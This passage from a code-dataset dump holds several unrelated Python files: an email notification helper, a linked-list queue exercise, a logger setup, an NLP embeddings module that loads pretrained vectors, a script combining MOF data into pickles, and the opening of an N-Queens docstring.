smtp_send_completion_email(config, display_body):\n if (config['send_notification_email_on_completion']):\n email_details = config['notification_email_on_completion']\n\n email_to_send = new_email_nonmultipart(\n email_from=config['smtp_forward_from'],\n email_to=email_details.recipients,\n subject=email_details.subject,\n bodytext=email_details.body_prefix + '\\n\\n' + display_body,\n )\n\n send_email_from_config(config, 
email_to_send)\n\n","repo_name":"TarquinQ/email-rule-enforcer","sub_path":"email-rule-enforcer/modules/email/smtp_send_completion_email.py","file_name":"smtp_send_completion_email.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2972827431","text":"### SKU CoE ITE - ParkSooYoung ###\r\n### Grade 2 , Semester 1 , Chapter 3 , Number 4 ###\r\n\r\nclass Node:\r\n    def __init__(self, item, n): # Node constructor: the item and a reference to the next node\r\n        self.item = item\r\n        self.next = n\r\n\r\ndef add(item): # insertion operation\r\n    global size # global variable\r\n    global front # global variable\r\n    global rear # global variable\r\n    new_node = Node(item, None) # create a new Node object\r\n    if size == 0:\r\n        front = new_node # insert at the back of the linked list\r\n    else:\r\n        rear.next = new_node # insert at the back of the linked list\r\n    rear = new_node\r\n    size += 1\r\n\r\ndef remove(): # deletion operation\r\n    global size # global variable\r\n    global front # global variable\r\n    global rear # global variable\r\n    if size != 0:\r\n        fitem = front.item\r\n        front = front.next # detach the node front was referencing from the linked list\r\n        size -= 1\r\n        if size == 0:\r\n            rear = None\r\n        return fitem # return the removed front item\r\n\r\ndef print_q(): # print the queue\r\n    p = front\r\n    print('front : ', end='')\r\n    while p:\r\n        if p.next != None:\r\n            print(p.item, '-> ', end='') # print the items of the singly linked list in order\r\n        else:\r\n            print(p.item, end='')\r\n        p = p.next\r\n    print(' : rear')\r\n\r\n# initialization\r\nfront = None\r\nrear = None\r\nsize = 0\r\nadd('apple')\r\nadd('orange')\r\nadd('cherry')\r\nadd('pear')\r\nprint('After inserting apple, orange, cherry, pear : \\t', end='')\r\nprint_q()\r\nremove()\r\nprint('After remove : \\t\\t', end='')\r\nprint_q()\r\nremove()\r\nprint('After remove : \\t\\t', end='')\r\nprint_q()\r\nadd('grape')\r\nprint('After inserting grape : \\t\\t', end='')\r\nprint_q()\r\n","repo_name":"ParkSooYeong/2-1-Data-Structure","sub_path":"Chapter 3/2-1-3-4 slist queue.py","file_name":"2-1-3-4 slist queue.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37326586089","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport logging\nimport os\nimport colorlog\nimport re\nfrom colorama import init\n\nlog_colors_config = {\n    'DEBUG': 'cyan',\n    'WARNING': 'yellow',\n    'ERROR': 'red',\n    'CRITICAL': 'red',\n}\n\n\ndef get_local_time():\n    r\"\"\"Get current time\n\n    Returns:\n        str: current time\n    \"\"\"\n    cur = datetime.datetime.now()\n    cur = cur.strftime('%b-%d-%Y_%H-%M-%S')\n\n    return cur\n\n\ndef ensure_dir(dir_path):\n    r\"\"\"Make sure the directory exists, if it does not exist, create it\n\n    Args:\n        dir_path (str): directory path\n\n    \"\"\"\n    if not os.path.exists(dir_path):\n        os.makedirs(dir_path)\n\n\nclass RemoveColorFilter(logging.Filter):\n\n    def filter(self, record):\n        if record:\n            ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n            record.msg = ansi_escape.sub('', str(record.msg))\n        return True\n\n\ndef set_color(log, color, highlight=True):\n    color_set = ['black', 'red', 'green', 'yellow', 'blue', 'pink', 'cyan', 'white']\n    try:\n        index = color_set.index(color)\n    except:\n        index = len(color_set) - 1\n    prev_log = '\\033['\n    if highlight:\n        prev_log += '1;3'\n    else:\n        prev_log += '0;3'\n    prev_log += str(index) + 'm'\n    return prev_log + log + '\\033[0m'\n\n\ndef init_logger(params):\n    \"\"\"\n    A logger that can show a message on standard output and write it into the\n    file named `filename` simultaneously.\n    All the message that you want to log MUST be str.\n\n    Args:\n        params: A dict of parameters, used to record parameter 
information.\n\n \"\"\"\n init(autoreset=True)\n LOGROOT = './log/'\n dir_name = os.path.dirname(LOGROOT)\n ensure_dir(dir_name)\n\n logfilename = 'PDMRec-<{}>-{}.log'.format(params['dataset'], get_local_time())\n\n logfilepath = os.path.join(LOGROOT, logfilename)\n\n # -是左对齐的意思,15是不足15个字符,用空格补全\n filefmt = \"%(asctime)-15s %(levelname)s %(message)s\"\n filedatefmt = \"%a %d %b %Y %H:%M:%S\"\n fileformatter = logging.Formatter(filefmt, filedatefmt)\n\n sfmt = \"%(log_color)s%(asctime)-15s %(levelname)s %(message)s\"\n sdatefmt = \"%d %b %H:%M\"\n sformatter = colorlog.ColoredFormatter(sfmt, sdatefmt, log_colors=log_colors_config)\n\n level = logging.INFO\n\n fh = logging.FileHandler(logfilepath)\n fh.setLevel(level)\n fh.setFormatter(fileformatter)\n remove_color_filter = RemoveColorFilter()\n fh.addFilter(remove_color_filter)\n\n sh = logging.StreamHandler()\n sh.setLevel(level)\n sh.setFormatter(sformatter)\n\n logging.basicConfig(level=level, handlers=[sh, fh])\n","repo_name":"Ethan-Yys/PDMRec","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6293481788","text":"import pickle\nimport re\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import List, Dict, Tuple\n\nimport gensim\nimport numpy as np\nimport torch\n\nfrom .file_utils import cached_path\nfrom .language_model import RNNModel\nfrom .data import Dictionary, Token, Sentence, TaggedCorpus\n\n\nclass TextEmbeddings(torch.nn.Module):\n \"\"\"Abstract base class for all embeddings. Ever new type of embedding must implement these methods.\"\"\"\n\n @property\n @abstractmethod\n def embedding_length(self) -> int:\n \"\"\"Returns the length of the embedding vector.\"\"\"\n pass\n\n @property\n def embedding_type(self) -> str:\n return 'word-level'\n\n def embed(self, sentences: List[Sentence]) -> List[Sentence]:\n \"\"\"Add embeddings to all words in a list of sentences. 
If embeddings are already added, updates only if embeddings\n are non-static.\"\"\"\n\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n everything_embedded: bool = True\n\n if self.embedding_type == 'word-level':\n for sentence in sentences:\n for token in sentence.tokens:\n if self.name not in token._embeddings.keys(): everything_embedded = False\n else:\n for sentence in sentences:\n if self.name not in sentence._embeddings.keys(): everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n self._add_embeddings_internal(sentences)\n\n return sentences\n\n @abstractmethod\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n \"\"\"Private method for adding embeddings to all words in a list of sentences.\"\"\"\n pass\n\n\nclass StackedEmbeddings(TextEmbeddings):\n \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n def __init__(self, embeddings: List[TextEmbeddings], detach: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings = embeddings\n\n # IMPORTANT: add embeddings as torch modules\n for i, embedding in enumerate(embeddings):\n self.add_module('list_embedding_%s' % str(i), embedding)\n\n self.detach = detach\n self.name = 'Stack'\n self.static_embeddings = True\n\n self.__embedding_type: int = embeddings[0].embedding_type\n\n self.__embedding_length: int = 0\n for embedding in embeddings:\n self.__embedding_length += embedding.embedding_length\n\n def embed(self, sentences: List[Sentence], static_embeddings: bool = True):\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n @property\n def embedding_type(self):\n return self.__embedding_type\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for embedding in self.embeddings:\n embedding._add_embeddings_internal(sentences)\n\n return sentences\n\n\nclass WordEmbeddings(TextEmbeddings):\n \"\"\"Standard static word embeddings, such as GloVe or FastText.\"\"\"\n\n def __init__(self, embeddings):\n \"\"\"Init one of: 'glove', 'extvec', 'ft-crawl', 'ft-german'.\n Constructor downloads required files if not there.\"\"\"\n\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/'\n\n # GLOVE embeddings\n if embeddings.lower() == 'glove' or embeddings.lower() == 'en-glove':\n cached_path(os.path.join(base_path, 'glove.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'glove.gensim'), cache_dir='embeddings')\n\n # KOMNIOS embeddings\n if embeddings.lower() == 'extvec' or embeddings.lower() == 'en-extvec':\n cached_path(os.path.join(base_path, 'extvec.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'extvec.gensim'), cache_dir='embeddings')\n\n # NUMBERBATCH embeddings\n if embeddings.lower() == 'numberbatch' or embeddings.lower() == 'en-numberbatch':\n cached_path(os.path.join(base_path, 'numberbatch-en.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'numberbatch-en'), cache_dir='embeddings')\n\n # FT-CRAWL embeddings\n if embeddings.lower() == 'crawl' or embeddings.lower() == 'en-crawl':\n cached_path(os.path.join(base_path, 'ft-crawl.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = 
cached_path(os.path.join(base_path, 'ft-crawl.gensim'), cache_dir='embeddings')\n\n # FT-NEWS embeddings\n if embeddings.lower() == 'news' or embeddings.lower() == 'en-news':\n cached_path(os.path.join(base_path, 'ft-news.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'ft-news.gensim'), cache_dir='embeddings')\n\n # GERMAN FASTTEXT embeddings\n if embeddings.lower() == 'de-fasttext':\n cached_path(os.path.join(base_path, 'ft-wiki-de.gensim.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'ft-wiki-de.gensim'), cache_dir='embeddings')\n\n # GERMAN NUMBERBATCH embeddings\n if embeddings.lower() == 'de-numberbatch':\n cached_path(os.path.join(base_path, 'de-numberbatch.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'de-numberbatch'), cache_dir='embeddings')\n\n # SWEDISH FASTTEXT embeddings\n if embeddings.lower() == 'sv-fasttext':\n cached_path(os.path.join(base_path, 'cc.sv.300.vectors.npy'), cache_dir='embeddings')\n embeddings = cached_path(os.path.join(base_path, 'cc.sv.300'), cache_dir='embeddings')\n\n self.name = embeddings\n self.static_embeddings = True\n\n self.precomputed_word_embeddings = gensim.models.KeyedVectors.load(embeddings)\n\n self.known_words = set(self.precomputed_word_embeddings.index2word)\n\n self.__embedding_length: int = self.precomputed_word_embeddings.vector_size\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n\n if token.text in self.known_words:\n word_embedding = self.precomputed_word_embeddings[token.text]\n elif token.text.lower() in self.known_words:\n word_embedding = self.precomputed_word_embeddings[token.text.lower()]\n elif re.sub(r'\\d', '#', token.text.lower()) in self.known_words:\n word_embedding = self.precomputed_word_embeddings[re.sub(r'\\d', '#', token.text.lower())]\n elif re.sub(r'\\d', '0', token.text.lower()) in self.known_words:\n word_embedding = self.precomputed_word_embeddings[re.sub(r'\\d', '0', token.text.lower())]\n else:\n word_embedding = np.zeros(self.embedding_length, dtype='float')\n\n word_embedding = torch.autograd.Variable(torch.FloatTensor(word_embedding))\n token.set_embedding(self.name, word_embedding)\n\n return sentences\n\n\nclass CharacterEmbeddings(TextEmbeddings):\n \"\"\"Character embeddings of words, as proposed in Lample et al., 2016.\"\"\"\n\n def __init__(self, path_to_char_dict: str = None):\n \"\"\"Uses the default character dictionary if none provided.\"\"\"\n\n super(CharacterEmbeddings, self).__init__()\n self.name = 'Char'\n self.static_embeddings = False\n\n # get list of common characters if none provided\n if path_to_char_dict is None:\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/models/common_characters'\n char_dict = cached_path(base_path, cache_dir='datasets')\n else:\n # fix: the original never assigned char_dict when a path was provided\n char_dict = path_to_char_dict\n\n # load dictionary\n self.char_dictionary: Dictionary = Dictionary()\n with open(char_dict, 'rb') as f:\n mappings = pickle.load(f, encoding='latin1')\n idx2item = mappings['idx2item']\n item2idx = mappings['item2idx']\n self.char_dictionary.item2idx = item2idx\n self.char_dictionary.idx2item = idx2item\n # print(self.char_dictionary.item2idx)\n\n self.char_embedding_dim: int = 25\n self.hidden_size_char: int 
= 25\n self.char_embedding = torch.nn.Embedding(len(self.char_dictionary.item2idx), self.char_embedding_dim)\n self.char_rnn = torch.nn.LSTM(self.char_embedding_dim, self.hidden_size_char, num_layers=1,\n bidirectional=True)\n\n self.__embedding_length = self.char_embedding_dim * 2\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for sentence in sentences:\n\n tokens_char_indices = []\n\n # translate words in sentence into ints using dictionary\n for token in sentence.tokens:\n token: Token = token\n # print(token)\n char_indices = [self.char_dictionary.get_idx_for_item(char) for char in token.text]\n tokens_char_indices.append(char_indices)\n\n # sort words by length, for batching and masking\n tokens_sorted_by_length = sorted(tokens_char_indices, key=lambda p: len(p), reverse=True)\n d = {}\n for i, ci in enumerate(tokens_char_indices):\n for j, cj in enumerate(tokens_sorted_by_length):\n if ci == cj:\n d[j] = i\n continue\n chars2_length = [len(c) for c in tokens_sorted_by_length]\n longest_token_in_sentence = max(chars2_length)\n tokens_mask = np.zeros((len(tokens_sorted_by_length), longest_token_in_sentence), dtype='int')\n for i, c in enumerate(tokens_sorted_by_length):\n tokens_mask[i, :chars2_length[i]] = c\n\n tokens_mask = torch.autograd.Variable(torch.LongTensor(tokens_mask))\n\n # chars for rnn processing\n chars = tokens_mask\n if torch.cuda.is_available():\n chars = chars.cuda()\n\n character_embeddings = self.char_embedding(chars).transpose(0, 1)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(character_embeddings, chars2_length)\n\n lstm_out, self.hidden = self.char_rnn(packed)\n\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n outputs = outputs.transpose(0, 1)\n chars_embeds_temp = torch.autograd.Variable(\n torch.FloatTensor(torch.zeros((outputs.size(0), outputs.size(2)))))\n if torch.cuda.is_available():\n chars_embeds_temp = chars_embeds_temp.cuda()\n for i, index in enumerate(output_lengths):\n chars_embeds_temp[i] = outputs[i, index - 1]\n character_embeddings = chars_embeds_temp.clone()\n for i in range(character_embeddings.size(0)):\n character_embeddings[d[i]] = chars_embeds_temp[i]\n\n for token_number, token in enumerate(sentence.tokens):\n token.set_embedding(self.name, character_embeddings[token_number].cpu())\n\n\nclass CharLMEmbeddings(TextEmbeddings):\n \"\"\"Contextual string embeddings of words, as proposed in Akbik et al., 2018.\"\"\"\n\n def __init__(self, model, detach: bool = True):\n super().__init__()\n\n \"\"\"\n Contextual string embeddings of words, as proposed in Akbik et al., 2018.\n\n Parameters\n ----------\n arg1 : model\n model string, one of 'news-forward', 'news-backward', 'mix-forward', 'mix-backward', 'german-forward',\n 'german-backward' depending on which character language model is desired\n arg2 : detach\n if set to false, the gradient will propagate into the language model. 
this dramatically slows down\n training and often leads to worse results, so not recommended.\n \"\"\"\n\n # news-english-forward\n if model.lower() == 'news-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-news-english-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # news-english-backward\n if model.lower() == 'news-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-news-english-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-forward\n if model.lower() == 'mix-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-english-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-english-backward\n if model.lower() == 'mix-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-english-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-german-forward\n if model.lower() == 'german-forward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-german-forward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n # mix-german-backward\n if model.lower() == 'german-backward':\n base_path = 'https://s3.eu-central-1.amazonaws.com/alan-nlp/resources/embeddings/lm-mix-german-backward.pt'\n model = cached_path(base_path, cache_dir='embeddings')\n\n self.name = model\n self.static_embeddings = detach\n\n self.lm: RNNModel = RNNModel.load_language_model(model)\n if torch.cuda.is_available():\n self.lm = self.lm.cuda()\n self.lm.eval()\n\n self.detach = detach\n\n self.is_forward_lm: bool = self.lm.is_forward_lm\n if self.is_forward_lm:\n print('FORWARD language model loaded')\n else:\n print('BACKWARD language model loaded')\n\n print('on cuda:')\n print(next(self.lm.parameters()).is_cuda)\n\n dummy_sentence: Sentence = Sentence()\n dummy_sentence.add_token(Token('hello'))\n embedded_dummy = self.embed([dummy_sentence])\n self.__embedding_length: int = len(embedded_dummy[0].get_token(1).get_embedding())\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n # find longest sentence by characters\n longest_character_sequence_in_batch: int = 0\n for sentence in sentences:\n if len(\n sentence.to_plain_string()) > longest_character_sequence_in_batch: longest_character_sequence_in_batch \\\n = len(sentence.to_plain_string())\n\n sentences_padded: List[str] = []\n\n for sentence in sentences:\n if self.is_forward_lm:\n sentences_padded.append(\n '\\n' + sentence.to_plain_string() + ' ' + (\n (longest_character_sequence_in_batch - len(sentence.to_plain_string())) * ' '))\n else:\n sentences_padded.append(\n '\\n' + sentence.to_plain_string()[::-1] + ' ' + (\n (longest_character_sequence_in_batch - len(sentence.to_plain_string())) * ' '))\n\n # print(sentences_padded)\n\n # get states from LM\n all_hidden_states_in_lm = self.lm.get_representation(sentences_padded, self.detach)\n\n for i, sentence in enumerate(sentences):\n\n offset_forward: int = 1\n offset_backward: int = len(sentence.to_plain_string()) + 1\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n\n offset_forward += len(token.text)\n\n if self.is_forward_lm:\n offset = offset_forward\n else:\n offset = offset_backward\n\n embedding = 
all_hidden_states_in_lm[offset, i, :].data.cpu()\n # if not torch.cuda.is_available():\n # embedding = embedding.cpu()\n\n offset_forward += 1\n\n offset_backward -= 1\n offset_backward -= len(token.text)\n\n token.set_embedding(self.name, torch.autograd.Variable(embedding))\n self.__embedding_length = len(embedding)\n\n return sentences\n\n\nclass OnePassStoreEmbeddings(TextEmbeddings):\n def __init__(self, embedding_stack: StackedEmbeddings, corpus: TaggedCorpus, detach: bool = True):\n super().__init__()\n\n self.embedding_stack = embedding_stack\n self.detach = detach\n self.name = 'Stack'\n self.static_embeddings = True\n\n self.__embedding_length: int = embedding_stack.embedding_length\n print(self.embedding_length)\n\n sentences = corpus.get_all_sentences()\n mini_batch_size: int = 32\n sentence_no: int = 0\n written_embeddings: int = 0\n\n total_count = 0\n for sentence in sentences:\n for token in sentence.tokens:\n total_count += 1\n\n embeddings_vec = 'fragment_embeddings.vec'\n with open(embeddings_vec, 'a') as f:\n\n f.write('%d %d\\n' % (total_count, self.embedding_stack.embedding_length))\n\n batches = [sentences[x:x + mini_batch_size] for x in\n range(0, len(sentences), mini_batch_size)]\n\n for batch in batches:\n\n self.embedding_stack.embed(batch)\n\n for sentence in batch:\n sentence: Sentence = sentence\n sentence_no += 1\n print('%d\\t(%d)' % (sentence_no, written_embeddings))\n # lines: List[str] = []\n\n for token in sentence.tokens:\n token: Token = token\n\n signature = self.get_signature(token)\n vector = token.get_embedding().data.numpy().tolist()\n vector = ' '.join(map(str, vector))\n vec = signature + ' ' + vector\n # lines.append(vec)\n written_embeddings += 1\n token.clear_embeddings()\n\n f.write('%s\\n' % vec)\n\n vectors = gensim.models.KeyedVectors.load_word2vec_format(embeddings_vec, binary=False)\n vectors.save('stored_embeddings')\n import os\n os.remove('fragment_embeddings.vec')\n vectors = None\n\n self.embeddings = WordEmbeddings('stored_embeddings')\n\n def get_signature(self, token: Token) -> str:\n context: str = ' '\n for i in range(token.idx - 4, token.idx + 5):\n if token.sentence.get_token(i) is not None:\n context += token.sentence.get_token(i).text + ' '\n signature = '%s··%d:··%s' % (token.text, token.idx, context)\n return signature.strip().replace(' ', '·')\n\n def embed(self, sentences: List[Sentence], static_embeddings: bool = True):\n\n for sentence in sentences:\n for token in sentence.tokens:\n signature = self.get_signature(token)\n word_embedding = self.embeddings.precomputed_word_embeddings.get_vector(signature)\n word_embedding = torch.autograd.Variable(torch.FloatTensor(word_embedding))\n token.set_embedding(self.name, word_embedding)\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n return sentences\n\n\nclass TextMeanEmbedder(TextEmbeddings):\n\n def __init__(self, word_embeddings: List[TextEmbeddings], reproject_words: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=word_embeddings)\n self.name: str = 'word_mean'\n self.reproject_words: bool = reproject_words\n self.static_embeddings: bool = not reproject_words\n\n self.__embedding_length: int = 0\n self.__embedding_length = self.embeddings.embedding_length\n\n self.word_reprojection_map = torch.nn.Linear(self.__embedding_length, 
self.__embedding_length)\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def embed(self, paragraphs: List[Sentence]):\n \"\"\"Add embeddings to every sentence in the given list of sentences. If embeddings are already added, updates\n only if embeddings are non-static.\"\"\"\n\n everything_embedded: bool = True\n\n # if only one sentence is passed, convert to list of sentence\n if type(paragraphs) is Sentence:\n paragraphs = [paragraphs]\n\n for paragraph in paragraphs:\n if self.name not in paragraph._embeddings.keys(): everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n\n self.embeddings.embed(paragraphs)\n\n for paragraph in paragraphs:\n word_embeddings = []\n for token in paragraph.tokens:\n token: Token = token\n word_embeddings.append(token.get_embedding().unsqueeze(0))\n\n word_embeddings = torch.cat(word_embeddings, dim=0)\n if torch.cuda.is_available():\n word_embeddings = word_embeddings.cuda()\n\n if self.reproject_words:\n word_embeddings = self.word_reprojection_map(word_embeddings)\n\n mean_embedding = torch.mean(word_embeddings, 0)\n\n # mean_embedding /= len(paragraph.tokens)\n paragraph.set_embedding(self.name, mean_embedding)\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n\n\nclass TextLSTMEmbedder(TextEmbeddings):\n\n def __init__(self, word_embeddings: List[TextEmbeddings], hidden_states=128, num_layers=1,\n reproject_words: bool = True):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n # self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=word_embeddings)\n self.embeddings: List[TextEmbeddings] = word_embeddings\n\n self.reproject_words = reproject_words\n\n self.length_of_all_word_embeddings = 0\n for word_embedding in self.embeddings:\n self.length_of_all_word_embeddings += word_embedding.embedding_length\n\n self.name = 'text_lstm'\n self.static_embeddings = False\n\n # self.__embedding_length: int = hidden_states\n self.__embedding_length: int = hidden_states * 2\n\n # bidirectional LSTM on top of embedding layer\n self.word_reprojection_map = torch.nn.Linear(self.length_of_all_word_embeddings,\n self.length_of_all_word_embeddings)\n self.rnn = torch.nn.LSTM(self.length_of_all_word_embeddings, hidden_states, num_layers=num_layers,\n bidirectional=True)\n self.dropout = torch.nn.Dropout(0.5)\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def embed(self, sentences: List[Sentence]):\n \"\"\"Add embeddings to all sentences in the given list of sentences. 
If embeddings are already added, update\n only if embeddings are non-static.\"\"\"\n\n self.rnn.zero_grad()\n\n sentences.sort(key=lambda x: len(x), reverse=True)\n\n for word_embedding in self.embeddings:\n word_embedding.embed(sentences)\n\n # first, sort sentences by number of tokens\n longest_token_sequence_in_batch: int = len(sentences[0])\n\n all_sentence_tensors = []\n lengths: List[int] = []\n\n # go through each sentence in batch\n for i, sentence in enumerate(sentences):\n\n lengths.append(len(sentence.tokens))\n\n word_embeddings = []\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n token: Token = token\n word_embeddings.append(token.get_embedding().unsqueeze(0))\n\n # PADDING: pad shorter sentences out\n for add in range(longest_token_sequence_in_batch - len(sentence.tokens)):\n word_embeddings.append(\n torch.autograd.Variable(\n torch.FloatTensor(np.zeros(self.length_of_all_word_embeddings, dtype='float')).unsqueeze(0)))\n\n word_embeddings_tensor = torch.cat(word_embeddings, 0)\n\n sentence_states = word_embeddings_tensor\n\n # ADD TO SENTENCE LIST: add the representation\n all_sentence_tensors.append(sentence_states.unsqueeze(1))\n\n # --------------------------------------------------------------------\n # GET REPRESENTATION FOR ENTIRE BATCH\n # --------------------------------------------------------------------\n sentence_tensor = torch.cat(all_sentence_tensors, 1)\n if torch.cuda.is_available():\n sentence_tensor = sentence_tensor.cuda()\n\n # --------------------------------------------------------------------\n # FF PART\n # --------------------------------------------------------------------\n if self.reproject_words:\n sentence_tensor = self.word_reprojection_map(sentence_tensor)\n\n sentence_tensor = self.dropout(sentence_tensor)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(sentence_tensor, lengths)\n\n lstm_out, hidden = self.rnn(packed)\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n\n outputs = self.dropout(outputs)\n\n for i, sentence in enumerate(sentences):\n embedding = outputs[output_lengths[i].item() - 1, i]\n sentence.set_embedding(self.name, embedding)\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n\n\nclass TextLMEmbedder(TextEmbeddings):\n def __init__(self, charlm_embeddings: List[CharLMEmbeddings], detach: bool = True):\n super().__init__()\n\n self.embeddings = charlm_embeddings\n\n self.static_embeddings = detach\n self.detach = detach\n\n dummy: Sentence = Sentence('jo')\n self.embed([dummy])\n self._embedding_length: int = len(dummy.embedding)\n\n @property\n def embedding_length(self) -> int:\n return self._embedding_length\n\n @property\n def embedding_type(self):\n return 'sentence-level'\n\n def embed(self, sentences: List[Sentence]):\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n # iterate over sentences\n for sentence in sentences:\n\n # if its a forward LM, take last state\n if embedding.is_forward_lm:\n sentence.set_embedding(embedding.name, sentence[len(sentence)]._embeddings[embedding.name])\n else:\n sentence.set_embedding(embedding.name, sentence[1]._embeddings[embedding.name])\n\n return sentences\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n pass\n","repo_name":"navbehl/text_processing","sub_path":"ner/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":28082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} 
+{"seq_id":"4384450723","text":"'''\ncombing each material data into one file\n将单独的理论数据tsv文件整合进一个pickle文件\n'''\n\nimport os\nimport numpy as np\nimport pandas as pd\n\nall_data_path = r'/home/wanghong/work/MOF_project/2019_11_3MOF/20191002mofdata'\n\ndata = pd.DataFrame()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 创建空的容器\nlabel = []\n\n# 'test data'\n# test_file = r'/home/wanghong/work/MOF_project/2019_9MOF/20191002mofdata/149068 MOF HOCHEM.tsv'\n# one_data = pd.read_csv(test_file, sep='\\t', header=None)\n# one_data_column = pd.DataFrame(one_data.iloc[:,-1])\n# print(one_data_column.type)\n\nfor i, file_name in enumerate(os.listdir(all_data_path)):\n\n\tone_data_path = os.path.join(all_data_path, file_name)\n\n\tif one_data_path[-3:] != 'tsv': \t\t\t\t\t\t\t\t\t\t# 只有tsv结尾的文件数据能被读取\n\t\tcontinue\n\n\tone_data = pd.read_csv(one_data_path, sep='\\t', header=None)\t\t# 分离数据\n\tone_data_column = pd.DataFrame(one_data.iloc[:,-1])\t\t\t\t\t\t# 数据分为两列,第一列1-50间隔0.2,无用。取第二列对应的理论值\n\n\tone_data_row = one_data_column.T \t\t\t\t\t\t\t\t\t\t# 列数据转置成行数据\n\tdata = pd.concat([data, one_data_row])\t\t\t\t\t\t\t\t\t\t# 将每次读取的单个数据和前面读取的数据合并\n\n\t# print((file_name.split()[-1])[:-4]) \t\t\t\t\t\t\t\t\t\t#ex: UCOQEK.tsv remove .tsv\n\n\tlabel.append(((file_name.split()[-1])[:-4]))\n\npd.to_pickle(data, \"prep_theo_data.pickle\" )\npd.to_pickle(label, \"prep_theo_label.pickle\")\nprint('output lable type is: {}'.format(type(label)))\nprint('output lable length is: {}'.format(len(label)))\n\n# print(label) \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 打印查看全部的label,看是佛有数字或不正确的的lable存在其中\n","repo_name":"NANBFTOP5/MOF","sub_path":"new train code/combine_each_data2onefile.py","file_name":"combine_each_data2onefile.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30737011603","text":"\"\"\"\nPlace N Queens on an NxN chessboard, in such a manner that no two queens attack each other. \nA queen can move horizontally, vertically, and diagonally.\n\n - Start in the leftmost column.\n - If all the queens are placed\n return true\n - Try all rows in the current column. 
